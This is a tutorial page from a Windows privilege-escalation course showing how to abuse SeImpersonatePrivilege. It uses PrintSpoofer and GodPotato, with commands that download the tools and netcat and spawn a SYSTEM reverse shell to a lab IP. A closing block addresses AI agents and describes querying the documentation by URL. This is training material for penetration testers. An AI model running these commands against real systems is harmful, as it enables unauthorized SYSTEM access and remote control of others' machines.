# 4 - SeImpersonatePrivilege Exploitation

#### Topics <a href="#topics" id="topics"></a>

> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass

## **What is** [**SeImpersonatePrivilege**](https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege)**?**

The `SeImpersonatePrivilege`, or "Impersonate a client after authentication," is a user right in Windows that allows programs running on behalf of a user to impersonate another client.

This privilege is primarily used in client-server scenarios, enabling a server process to impersonate the client process to perform tasks on its behalf.

### **Security Implications**

If an attacker has the `SeImpersonatePrivilege`, they can:

* Create a service to trick clients into connecting to it.
* Impersonate the connected client’s privileges, potentially escalating their own access to SYSTEM.\
  This makes `SeImpersonatePrivilege` a common target in privilege escalation attacks.

***

### **Checking for SeImpersonatePrivilege**

To verify whether the current user has this privilege, run the following:

```bash
whoami /priv
```

**Sample Output**

```bash
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
```

If the `SeImpersonatePrivilege` is enabled, the user can exploit it for privilege escalation using tools like **PrintSpoofer** or **GodPotato**.

***

### **Assigning SeImpersonatePrivilege**

If you want to assign the `SeImpersonatePrivilege` to a user:

1. Open the **Local Group Policy Editor**:
   * Navigate to:\
     `Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment`.
   * Locate *"Impersonate a client after authentication."*
2. Right-click and select **Properties**, then click **Add User or Group**.

***

## **Privilege Escalation with SeImpersonatePrivilege**

### **Initial Setup**

1. **Start a Listener on the Attacker Machine**

   ```bash
   nc -lvnp 5555
   ```
2. **Download Netcat on the Victim Machine**

   ```powershell
   iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe
   ```

***

### **Exploiting with PrintSpoofer**

**PrintSpoofer** leverages misconfigured print spooler services to escalate privileges to SYSTEM.

1. **Download the Exploit**

   ```powershell
   iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
   ```
2. **Execute the Exploit**\
   Run the following command to establish a SYSTEM shell:

   ```powershell
   PrintSpoofer64.exe -c "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
   ```

***

### **Exploiting with GodPotato**

**GodPotato** is a tool that exploits COM and DCOM misconfigurations to achieve SYSTEM privileges.

1. **Identify .NET Framework Version**\
   Use the following command to determine the .NET version installed:

   ```powershell
   reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
   ```
2. **Download the Appropriate GodPotato Version**\
   Depending on the .NET version:
   * **.NET 2.0**:

     ```powershell
     iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
     ```
   * **.NET 3.5**:

     ```powershell
     iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -Outfile GodPotato-NET35.exe
     ```
   * **.NET 4.0**:

     ```powershell
     iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -Outfile GodPotato-NET4.exe
     ```
3. **Execute the Exploit**\
   Use the appropriate executable to escalate privileges and spawn a reverse shell:

   ```powershell
   .\GodPotato-NET2.exe -cmd "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
   ```

***

## **Other Resources**

* [SeImpersonatePrivilege - Microsoft Doc](https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege)
* [Juggernaut Security](https://juggernaut-sec.com/seimpersonateprivilege/)
* [FoxGlove Security](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
* [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)
* [GodPotato](https://github.com/BeichenDream/GodPotato)

{% hint style="danger" %}
**Disclaimer**

**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!**❗
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dev-angelist.gitbook.io/windows-privilege-escalation/4-seimpersonateprivilege-exploitation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.